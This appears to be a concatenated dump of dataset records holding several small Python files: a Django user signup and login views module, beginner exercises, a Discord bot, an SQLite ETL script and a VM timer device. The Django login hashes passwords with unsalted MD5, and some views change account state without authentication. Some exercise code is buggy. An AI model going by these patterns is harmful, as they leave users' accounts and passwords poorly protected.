Thanks.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n\n user = UserTable.objects.get(email_address=email)\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname+\" \"+user.name_table.lname\n request.session['email'] = email\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['rcver_mail'] = receiver[0][0]\n request.session['sender_mail'] = sender\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n print(user_form.errors, name_form.errors, gender_form.errors, bd_form.errors)\n return render(request, 'frontend/public/signup/signup.html', {'user_form':user_form, 'name_form':name_form, 'gender_form':gender_form, 'bd_form':bd_form})\n else:\n user_form = UserForm()\n name_form = NameForm()\n gender_form = GenderForm()\n bd_form = BirthDayForm()\n return render(request, 'frontend/public/signup/signup.html', {'user_form':user_form, 'name_form':name_form, 'gender_form':gender_form, 'bd_form':bd_form})\n\n\n\ndef profile(request):\n if request.method == \"POST\":\n code = EmailConfirmCode(request.POST)\n address = AddressForm(request.POST)\n imgform = UploadImage(request.POST, request.FILES)\n postForm = PostForm(request.POST, request.FILES)\n\n if code.is_valid():\n user_id = request.POST['id']\n code = code.cleaned_data['code']\n user = UserTable.objects.get(id=user_id)\n if user.email_verification_code.__eq__(code):\n msg = f\"Hello {user.name_table.fname} {user.name_table.lname}, Your email is successfully verified! Your account completed {user.profile_completion}%. Sorry to inform you, Settings and ViewProfile won't be activated till 100% profile completion. 
Thanks.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n user.email_validity = 1\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n code = EmailConfirmCode()\n messages.error(request, \"Verification code didn't match\", {'form': code})\n else:\n print(code.errors)\n\n if address.is_valid():\n user_id = request.POST['id']\n vlg = address.cleaned_data['village']\n cty = address.cleaned_data['city']\n zp = address.cleaned_data['zip']\n cntry = address.cleaned_data['country']\n AddressTable.objects.create(village=vlg, city=cty, zip=zp, country=cntry)\n address_ref = AddressTable.objects.filter(village=vlg, city=cty, zip=zp, country=cntry).last()\n\n user = UserTable.objects.get(id=user_id)\n adrst = AddressTable.objects.get(id=address_ref.id)\n\n user.address_table = adrst\n user.profile_completion = 80\n\n msg = f\"Thanks {user.name_table.fname} {user.name_table.lname}, last process was done successfully! Your account completed {user.profile_completion}%, You may upload your photo or skip this step to complete yout profile 100%. Sorry to inform you, Settings and ViewProfile won't be activated till 100% profile completion.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n print(address.errors)\n\n if imgform.is_valid():\n user_id = request.POST['id']\n image = imgform.cleaned_data['upimage']\n img = ProfilePhotoTable(\n profile_photo=image\n )\n img.save()\n image_ref = ProfilePhotoTable.objects.filter(profile_photo=image).last()\n image_obj = ProfilePhotoTable.objects.get(id=image_ref.id)\n\n user = UserTable.objects.get(id=user_id)\n user.pp_table = image_obj\n user.profile_completion = 100\n\n msg = f\"Thanks {user.name_table.fname} {user.name_table.lname}, Your account is {user.profile_completion}% completed. Therefore, Settings and ViewProfile is activated now. But your profile is under review. It will be reviewed manually. 
Once your profile is approved you will be able to create posts, like and comments.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n else:\n print(imgform.errors)\n\n return render(request, 'frontend/user/profile/profile.html', {'form': code, 'address':address, 'imgform':imgform, 'postForm':postForm})\n else:\n if request.session.has_key(\"id\"):\n code = EmailConfirmCode()\n address = AddressForm()\n imgform = UploadImage()\n postForm = PostForm()\n return render(request, 'frontend/user/profile/profile.html', {'form':code, 'address':address,'imgform':imgform, 'postForm':postForm})\n else:\n return redirect('login')\n\n\ndef resend_verification_code(request, name):\n name = NameTable.objects.get(slug_name=name)\n user = UserTable.objects.get(id=name.id)\n code = random.randint(10000,1000000)\n\n msg = f\"The email verification code has been resent to your email from {settings.EMAIL_HOST_USER}. Check your email and collect the code with 6 digits then verify your email. Thanks.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n user.msg_tabl = msg_obj\n user.email_verification_code = code\n user.save()\n\n subject = \"Demo App Email Verification Code.\"\n sender = settings.EMAIL_HOST_USER\n receiver = [[user.email_address], ]\n body = f\"Hello {user.name_table.fname} {user.name_table.lname},\\nWelcome to my demo testing web application. Thanks for your kind interest and help me to test the app performance.\\nYour demo app verification code is {code}. Don't share this code with others for your account safety.\\nThanks, Engr. Shaumik Ghosh.\"\n send_mail(subject, body, sender, receiver)\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n return redirect('profile')\n\n\n\ndef skip_uploading_image(request, name):\n name = NameTable.objects.get(slug_name=name)\n user = UserTable.objects.get(id=name.id)\n\n user.profile_completion = 100\n\n msg = f\"Thanks {user.name_table.fname} {user.name_table.lname}, Your account is {user.profile_completion}% completed. Therefore, Settings and ViewProfile is activated now. But your profile is under review. It will be reviewed manually. 
Once your profile is approved you will be able to create posts, like and comments.\"\n\n MessageTable.objects.create(message=msg)\n msg_ref = MessageTable.objects.filter(message=msg).last()\n msg_obj = MessageTable.objects.get(id=msg_ref.id)\n\n user.msg_tabl = msg_obj\n user.save()\n\n request.session['id'] = user.id\n request.session['name'] = user.name_table.fname + \" \" + user.name_table.lname\n request.session['email'] = user.email_address\n request.session['email_validity'] = user.email_validity\n request.session['user_activity'] = user.user_activity\n request.session['profile_completion'] = user.profile_completion\n request.session['gender'] = user.gender_table.gender\n request.session['pp'] = str(user.pp_table.profile_photo)\n request.session['slug_name'] = user.name_table.slug_name\n request.session['message'] = user.msg_tabl.message\n\n messages.success(request, 'You have choiced to keep default profile Image. No problem you are allowed to change your profile picture browsing settings if wanna do in the future, Thanks.')\n\n return redirect('profile')\n\n\ndef login(request):\n if request.method==\"POST\":\n loginform = LoginForm(request.POST)\n if loginform.is_valid():\n try:\n given_email = loginform.cleaned_data['email']\n password = loginform.cleaned_data['password']\n given_password = hashlib.md5(password.encode()).hexdigest()\n lgn = UserTable.objects.get(email_address=given_email, password=given_password)\n\n if lgn.email_address.__eq__(given_email) and lgn.password.__eq__(given_password):\n request.session['id'] = lgn.id\n request.session['name'] = lgn.name_table.fname + \" \" + lgn.name_table.lname\n request.session['email'] = lgn.email_address\n request.session['email_validity'] = lgn.email_validity\n request.session['user_activity'] = lgn.user_activity\n request.session['profile_completion'] = lgn.profile_completion\n request.session['gender'] = lgn.gender_table.gender\n request.session['pp'] = str(lgn.pp_table.profile_photo)\n request.session['slug_name'] = lgn.name_table.slug_name\n request.session['message'] = lgn.msg_tabl.message\n\n return redirect('profile')\n except:\n messages.error(request, \"Email or Password Error!\")\n return redirect('login')\n else:\n print(loginform.errors)\n return render(request, 'frontend/public/login/login.html', {'form':loginform})\n else:\n loginform = LoginForm()\n return render(request, 'frontend/public/login/login.html', {'form':loginform})\n\n\ndef logout(request):\n request.session.clear()\n request.session.flush()\n return redirect('login')\n\n\n# python manage.py migrate","repo_name":"pramodkumarp/Django-Intern-Projects","sub_path":"DynamicApp/BlogApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33497997886","text":"\n\n# write a python program to print maximum and minimum number in tuple\n\nx=(12,32,64,15,16,27,38)\ny=list(x)\nk=y[0]\np=y[0]\nfor i in y:\n if i>k:\n k=i\nprint('maximum is:',k)\n\nfor i in y:\n if i<p:\n p=i\nprint('minimum is:',p)","repo_name":"Meghakt123/python_assignment_2","sub_path":"q8.py","file_name":"q8.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3585816651","text":"data = [10, 20, 30, 40, 50]\nP = [0] * (len(data) + 1)\n\nfor i in range(len(data)):\n sum = 0\n for j in range(i + 1):\n sum += data[j]\n P[i + 1] = sum\n\nleft = int(input())\nright = 
int(input())\n\nresult = P[right] - P[left -1]\nprint(result)\n\ndata = [10, 20, 30, 40, 50]\nsum_value = 0\nprefix_sum = [0]\nfor i in data:\n sum_value += i\n prefix_sum.append(sum_value)\n\nleft = 3\nright = 4\nprint(prefix_sum[right] - prefix_sum[left - 1])","repo_name":"kkw2758/Algorithm","sub_path":"etc/구간 합.py","file_name":"구간 합.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35212111771","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn = int(input())\ngraph = [[] for _ in range(n)]\nparent = list(map(int, input().split()))\nroot = -1\nfor i in range(n):\n if parent[i] == -1:\n root = i\n else:\n graph[parent[i]].append(i)\ndeleted = int(input())\nq = deque([root] if root != deleted else [])\ncount = 0\nwhile q:\n v = q.popleft()\n leaf = 0\n for i in graph[v]:\n if i != deleted:\n leaf += 1\n q.append(i)\n if not leaf:\n count += 1\nprint(count)\n","repo_name":"hyh1016/boj-with-python","sub_path":"python/search/1068.py","file_name":"1068.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9917038250","text":"#HLNCEC001\r\n#Question4\r\n#Assignment8\r\n#program that uses recursive functions to find all palindromic primes between two integers\r\nimport sys\r\nsys.setrecursionlimit (30000)\r\n\r\nnv = 0\r\nnv_2 = 0\r\n\r\ndef palindrom(s, e):\r\n global nv\r\n if s!=e:\r\n if str(s)[::1] == str(s)[::-1]:\r\n nv = s\r\n s+=1\r\n return palindrom(s, e)\r\n else:\r\n s+=1 \r\n return palindrom(s, e)\r\n\r\nc = 2\r\ndef prime(a,b):\r\n global nv_2\r\n global c\r\n if a<=b:\r\n if a%c == 0 and a!=c:\r\n a+=1\r\n return prime(a,b) \r\n elif a%c != 0:\r\n c+=1\r\n return prime(a,b)\r\n elif a%c==0 and a == c:\r\n nv_2 = a\r\n #print(a)\r\n a+=1\r\n c = 2\r\n return prime(a,b) and True\r\n return False\r\n\r\n\r\ndef main():\r\n s= eval(input('Enter the starting point N:\\n'))\r\n e= eval(input('Enter the ending point M:\\n')) \r\n if palindrom(s,e) == nv :\r\n a=s\r\n b=e\r\n #print(a)\r\n if prime(a,b) == nv_2 :\r\n print(nv_2,\"c\")\r\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/hlncec001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5205632516","text":"\"\"\"\nThis file contains the function that constructs the full potential grid from the\nsquare and diagonal parts.\n\"\"\"\n\n# ---------- Imports ----------#\nimport numpy as np\nfrom matrix_operations import anti_transpose\nfrom matrix_operations import complete_anti_diagonal_symmetric\n\n# ---------- Construct ----------#\ndef construct(Square_grid, Diagonal_grid):\n \"\"\"\n Constructs the full potential grid from the square and diagonal parts.\n \n Args:\n Square_grid (numpy.ndarray): The square part of the potential grid.\n Diagonal_grid (numpy.ndarray): The diagonal part of the potential grid.\n \n Returns:\n Potential_grid (numpy.ndarray): The full potential grid.\n \"\"\"\n # Extract the size of the grid\n L = len(Square_grid)\n\n # Initialize full grid\n Potential_grid = np.zeros((2*L, 2*L))\n\n # Add the sqaure parts\n Potential_grid[0:L, 0:L] = Square_grid\n Potential_grid[L:2*L, L:2*L] = anti_transpose(Square_grid)\n\n # Complete the diagonal matrix\n Potential_grid[L:2*L, 0:L] = 
complete_anti_diagonal_symmetric(Diagonal_grid)\n\n return Potential_grid\n","repo_name":"Emilis-Strazdas/PHY204_project","sub_path":"construct.py","file_name":"construct.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3331595516","text":"import time\nimport math\nimport pytest\nfrom selenium import webdriver\n\n\n@pytest.fixture(scope=\"function\")\ndef browser():\n print(\"\\nstart browser for test..\")\n browser = webdriver.Chrome()\n browser.implicitly_wait(10)\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n\nclass TestAliensMessage():\n\n\n urls = [\"236895\", \"236896\", \"236897\", \"236898\", \"236899\", \"236903\", \"236904\", \"236905\", ]\n\n\n @pytest.mark.parametrize(\"number_of_link\", urls)\n def test_scenario(self, browser, number_of_link):\n link = \"https://stepik.org/lesson/{}/step/1\".format(number_of_link)\n browser.get(link)\n answer = str(math.log(int(time.time())))\n browser.find_element_by_css_selector('.textarea.ember-view').send_keys(answer)\n browser.find_element_by_css_selector('.submit-submission').click()\n feedback = browser.find_element_by_css_selector('.smart-hints__feedback').text\n assert \"Correct!\" in feedback, f\"ожидался ответ 'Correct!', но был получен '{feedback}'\"\n\n# The owls are not what they seem! OvO","repo_name":"SkajenaSobaka/Selenium-Stepik","sub_path":"test_fixture_task2.py","file_name":"test_fixture_task2.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20496020074","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom math import pi\n\ndef make_radar_chart(lst, filename=\"\"):\n categories = []\n values = []\n for i in lst:\n if i[0] not in categories:\n categories.append(i[0])\n values.append(0)\n index = categories.index(i[0])\n values[index] += i[1]\n # Weird quirk of matplotlib is the last one should be\n # a duplicate of the first one\n values += values[:1]\n n = len(categories)\n angles = [_ / float(n) * 2 * pi for _ in range(n)]\n angles += angles[:1]\n\n plt.polar(angles, values)\n plt.xticks(angles[:-1], categories)\n\n if filename:\n plt.savefig(filename)\n else:\n plt.show()\n\n\n","repo_name":"Diesel-Hadez/myhackathon","sub_path":"scripts/make_radar_chart.py","file_name":"make_radar_chart.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70388805241","text":"#!/usr/bin/python\n# watch pep8 --show-pep8 --ignore=E111,E114,E241,W391 ./vm.py\nimport threading\nimport time\n\n\nclass TimerWorker(threading.Thread):\n def __init__(self, vm):\n super(TimerWorker, self).__init__()\n self.vm = vm\n\n self.mutex = threading.Lock()\n self.alarm_time = 0\n self.activation_time = 0\n self.active = False\n self.shutdown = threading.Event()\n\n # This variable is used only in one thread (caller). 
No need to lock it.\n self.alarm = 0\n\n def set_alarm(self, miliseconds):\n self.alarm = miliseconds\n\n def activate(self):\n with self.mutex:\n self.activation_time = time.time()\n self.alarm_time = self.activation_time + self.alarm / 1000.0\n self.active = True\n\n def deactivate(self):\n with self.mutex:\n self.active = False\n\n def get_counter(self):\n with self.mutex:\n # We don't really have to count.\n res = int((time.time() - self.alarm_time) * 1000)\n return res\n\n def run(self):\n while not self.shutdown.is_set():\n self.mutex.acquire()\n if self.active and time.time() >= self.alarm_time:\n self.active = False\n self.mutex.release()\n self.vm.interrupt(self.vm.INT_PIT)\n else:\n self.mutex.release()\n\n time.sleep(0)\n\n\nclass VMDeviceTimer():\n def __init__(self, vm):\n self.worker = TimerWorker(vm)\n self.worker.start()\n self.control_register = 0\n\n self.remaining_counter_value = 0\n self.has_counter_data = False\n\n def handle_inbound(self, port, byte):\n if port == 0x71:\n self.worker.alarm = ((self.worker.alarm << 8) | byte) & 0xffff\n elif port == 0x70:\n activation_bit = byte & 1\n if activation_bit == 1:\n self.control_register = 1\n self.worker.activate()\n else:\n self.control_register = 0\n self.worker.deactivate()\n\n def handle_outbound(self, port):\n if port == 0x70:\n return self.control_register\n elif port == 0x71:\n if self.has_counter_data is False:\n counter = self.worker.get_counter()\n self.remaining_counter_value = (counter >> 8) & 0xff\n self.has_counter_data = True\n return counter & 0xff\n else:\n self.has_counter_data = False\n return self.remaining_counter_value\n\n def terminate(self):\n self.worker.shutdown.set()\n self.worker.join()\n","repo_name":"gynvael/zrozumiec-programowanie","sub_path":"007-Czesc_II-Rozdzial_3-Podstawy_architektury_komputerowe/vm_dev_timer.py","file_name":"vm_dev_timer.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"40"} +{"seq_id":"69964229240","text":"from __future__ import unicode_literals\nfrom django.conf.urls import url, include\nfrom django.conf import settings\nfrom . 
import views\nfrom .forms import ProfessorProfileForm\nfrom .models import ProfessorProfile, ExecutiveProfile\nfrom django.contrib.auth import views as auth_views\n\n# app_name = 'accounts'\n\nurlpatterns = [\n # url(r\"login/\", views.LoginView.as_view(), name=\"login\"),\n\n # prueba de curso 1.11.\n #url(r\"login/$\", auth_views.LoginView.as_view(template_name='accounts/login.html'), name='login'),\n\n #url(r\"logout/$\", auth_views.LogoutView.as_view(), name=\"logout\"),\n\n # verdadero\n url(r\"logout/$\", views.LogoutView.as_view(), name=\"logout\"),\n\n url(r\"signup/$\", views.SignUpView.as_view(), name=\"signup\"),\n url(r\"join/$\", views.signup, name=\"join\"),\n\n #url(r\"^preferences/(?P<pk>\\d+)$\",\n # views.AccountSettingsUpdateView.as_view(),\n # name='preferences'\n #),\n\n # basado en el usernames\n #url(r\"^profile/(?P<slug>[\\w\\-]+)/$\",\n # views.AccountProfilesView.as_view(),\n # name='profile'\n #),\n\n url(r\"^profile/u/(?P<slug>[\\w\\-]+)/$\",\n views.user_profile_update_view,\n name='profile'\n ),\n\n url(r\"^preferences/u/(?P<slug>[\\w.\\-]+)/$\",\n views.AccountSettingsUpdateView.as_view(),\n name='preferences'\n ),\n\n url(r\"^preferences/enterprise-user/@(?P<slug>[\\w.\\-]+)/$\",\n views.AccountSettingsEnterpriseUpdateView.as_view(),\n name='preference'\n ),\n\n\n #url(r\"^preferences/(?P<slug>[\\w.\\-]+)/$\",\n # views.AccountSettingsUpdateView.as_view(),\n # name='preferences'\n #),\n\n\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","repo_name":"christiandiazleon/ihost_project","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30984330233","text":"import discord\nfrom commands import *\nfrom messages import *\nfrom lounge import *\nfrom help_command import help_command_message\n\ntoken = 'YOUR_BOT_TOKEN_HERE'\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=help_command))\n\n@client.event\nasync def on_message(message):\n if not message.author.bot:\n if message.author in [lounge.owner for lounge in lounges]:\n lounge = [lounge for lounge in lounges if message.author == lounge.owner][0]\n else:\n lounge = None\n if message.content.startswith(create_lounge_command) and len(message.content.replace(create_lounge_command, '')) >= 1:\n if not lounge is None:\n await message.channel.send(embed=already_own_lounge_error(lounge.text_channels[0]))\n else:\n await Lounge(message.author, message.content.replace(create_lounge_command, ''), message.channel, message.guild).create_lounge()\n elif not lounge is None:\n if message.content == close_lounge_command:\n await lounge.close_lounge()\n elif message.content.startswith(add_text_channel_command) and len(message.content.replace(add_text_channel_command, '')) >= 1:\n await lounge.add_channel('text', message.content.replace(add_text_channel_command, ''), message.channel)\n elif message.content.startswith(add_voice_channel_command) and len(message.content.replace(add_voice_channel_command, '')) >= 1:\n await lounge.add_channel('voice', message.content.replace(add_voice_channel_command, ''), message.channel)\n elif message.content.startswith(remove_channel_command) and len(message.content.replace(remove_channel_command, '')) >= 1:\n await 
lounge.remove_channel(message.content.replace(remove_channel_command, ''), message.channel)\n elif message.content.startswith(invite_command) and len(message.content.replace(invite_command, '')) >= 1:\n await lounge.invite(message.mentions, message.channel)\n elif message.content.startswith(kick_command) and len(message.content.replace(kick_command, '')) >= 1:\n await lounge.kick(message.mentions, message.channel)\n elif message.content == help_command:\n await message.channel.send(embed=help_command_message(client.user))\n elif message.content.startswith(command_prefix):\n await message.channel.send(embed=not_lounge_owner_error)\n\nclient.run(token)\n","repo_name":"sohandillikar/DiscordLoungeBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29054806529","text":"import sqlite3\nimport numpy\nimport glob\nfrom datetime import datetime\nimport pandas as pd\nimport sqlalchemy\nimport matplotlib.pyplot as plt\n\n\n'''Procesos de ETL'''\ncount =0\n\ndef extraer_database(path):\n\n motorDB = sqlalchemy.create_engine(path)\n conectarDB = motorDB.connect()\n\n return motorDB, conectarDB\n\ndef extraer_tabla_a_pandas(conectarDB):\n\n query = '''SELECT C.FirstName AS [NOMBRE CLIENTE],\n MAX(T.Name) AS [PISTA],\n MAX(G.Name) AS [GENERO],\n MIN(PL.Name) AS [LISTA DE REPRODUCIÓN MENOS ESCUCHADA],\n COUNT(I.InvoiceId) AS [CANTIDAD DE FACTURAS],\n AVG(I.InvoiceId) AS [PROMEDIO DE FACTURAS],\n SUM(I.Total) AS TOTAL\n FROM employees E\n INNER JOIN customers C ON C.SupportRepId = E.EmployeeId\n INNER JOIN invoices I ON I.CustomerId = C.CustomerId\n INNER JOIN invoice_items IV ON IV.InvoiceId = I.InvoiceId\n INNER JOIN tracks T ON T.TrackId = IV.TrackId\n INNER JOIN media_types M ON M.MediaTypeId = T.MediaTypeId\n INNER JOIN genres G ON G.GenreId = T.GenreId\n INNER JOIN albums A ON A.AlbumId = T.AlbumId\n INNER JOIN artists AR ON AR.ArtistId = A.ArtistId\n INNER JOIN playlist_track P ON P.TrackId = T.TrackId\n INNER JOIN playlists PL ON PL.PlaylistId = P.PlaylistId\n GROUP BY 1\n ORDER BY SUM(I.Total) DESC\n LIMIT 5;'''\n result = conectarDB.execute(query)\n\n df = pd.DataFrame(result.fetchall())\n df.columns = result.keys()\n\n return df\n\ndef transformar_facturacion_promedio(datos):\n\n # Cálculo de promedio por País\n df_g = datos.groupby(['BillingCountry'])[['Total']].mean()\n df_g = df_g.reset_index()\n df_g.rename(columns={\"Total\": \"Promedio\"}, inplace=True)\n\n df = datos.merge(df_g, how=\"left\", left_on=\"BillingCountry\",\n right_on=\"BillingCountry\")\n\n return df\n\ndef transformar_rellenar_nulo(datos):\n\n # Procesamiento de completar los valores faltantes\n datos = datos.fillna({\"BillingState\": \"NA\", \"BillingPostalCode\": \"99999\"})\n\n return datos\n\ndef transformar_formato(datos):\n #df = pd.DataFrame({'InvoiceDate': '%d-%m-%Y'})\n\n datetime.strftime(datos.InvoiceDate, format='%d-%m-%Y')\n return datos\n\ndef exportar_csv(archivo_de_destino,df):\n df.to_csv(archivo_de_destino)\n\ndef cargar_a_sql(datos, connectar, tabla_sqlite):\n\n # Procesamiento de completar los valores faltantes\n\n datos.to_sql(tabla_sqlite, connectar, if_exists='fail')\n connectar.close()\n return 'La carga ha terminado'\n\nif __name__ == '__main__':\n path = \"sqlite:///chinook.db\"\n #ruta_destino = r'C:\\Users\\Usuario\\Desktop\\PROYECTO_MDB\\consulta1.csv'\n # Extracción\n extraerBD = extraer_database(path)\n\n #nombre_de_tabla = 'Invoices'\n engine = 
extraerBD[0]\n extraer = extraer_tabla_a_pandas(engine)\n\n # Transformación\n #transformar = transformar_facturacion_promedio(extraer)\n #transformar = transformar_rellenar_nulo(transformar)\n\n # carga de los datos\n datos = extraer\n conectar = extraerBD[1]\n tabla_sqlite = \"ETL\"\n nombre_tabla = \"ETL.csv\"\n exportar_csv(nombre_tabla,datos)\n cargar_a_sql(datos, conectar, tabla_sqlite)\n print(extraer)\n","repo_name":"wilmerxx/PROYECTO_MDB","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24066930514","text":"'''\nНаписать функцию num_translate(), переводящую числительные от 0 до 10 c английского на\nрусский язык. Например:\n//>>> num_translate(\"one\")\n\"один\"\n//>>> num_translate(\"eight\")\n\"восемь\"\nЕсли перевод сделать невозможно, вернуть None. Подумайте, как и где лучше хранить\nинформацию, необходимую для перевода: какой тип данных выбрать, в теле функции или\nснаружи.\n'''\n\n\"\"\"\nХод мысли:\nНаписать словарь соответсвия, где ключ - слово на английском, а значение слово на русском. Чтобы не было ошибки\nвоспользовать get, только вот вопрос где, можем при выводе?. А как сделать перевод в обе стороны и исключить ошибку \nпо вводу заглавных букв + выввести слово с заглавной буквы \n\"\"\"\n\n\ndef num_translate(number: str):\n translate_dict_to_en = {}\n translate_dict_to_ru = {\n 'one': 'один',\n 'zero': 'ноль',\n 'two': 'два',\n 'three': 'три',\n 'four': 'четыре',\n 'five': 'пять',\n 'six': 'шесть',\n 'seven': 'семь',\n 'eight': 'восемь',\n 'nine': 'девять',\n 'ten': 'десять'\n }\n for key, value in translate_dict_to_ru.items():\n translate_dict_to_en[value] = key\n if translate_dict_to_en.get(number.lower()):\n return translate_dict_to_en[number.lower()].capitalize()\n else:\n return translate_dict_to_ru.get(number.lower()).capitalize()\n\n\nif __name__ == \"__main__\":\n print(num_translate('one'))\n print(num_translate('eight'))\n\n\n","repo_name":"Gefahr87/Tatarenko_Vitaly_dz","sub_path":"Python/Task_3/Task_3_1.py","file_name":"Task_3_1.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22676996826","text":"from pathlib import Path\n\n\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom tqdm import tqdm\n\nimport pandas as pd\nfrom torch.utils.data import DataLoader\n\n\nfrom wsilearn.utils.cool_utils import read_json_dict, mkdir, Timer, is_string_or_path\nfrom wsilearn.dataconf import DataConf, TrainType\nfrom wsilearn.dl.pl.pl_inference import find_pl_model_path, load_pl_state_dict, InferenceOutWriter, Inferencer\nfrom wsilearn.compress.compressed_dataset import CompressedDataset\nfrom wsilearn.nic_utils import create_nic_model, HeatmapWriter\n\nfrom wsilearn.compress.compress import compress\n\nfrom wsilearn.utils.cool_utils import save_arrays, mkdir, list_intersection, dict_agg_type\nfrom wsilearn.dataconf import TrainType\nfrom wsilearn.utils.df_utils import unique_one, df_concat, df_save, print_df\nfrom wsilearn.utils.path_utils import PathUtils\nfrom wsilearn.nic_utils import HeatmapWriter\n\n\ndef combine_out(eval_dirs, out_dir, overwrite=False):\n print('combining %s' % str(eval_dirs))\n name_pathes_map = defaultdict(list)\n for ev in eval_dirs:\n ev = Path(ev)\n outs = PathUtils.list_pathes(ev, ending='npz')\n if len(outs)==0:\n ev = 
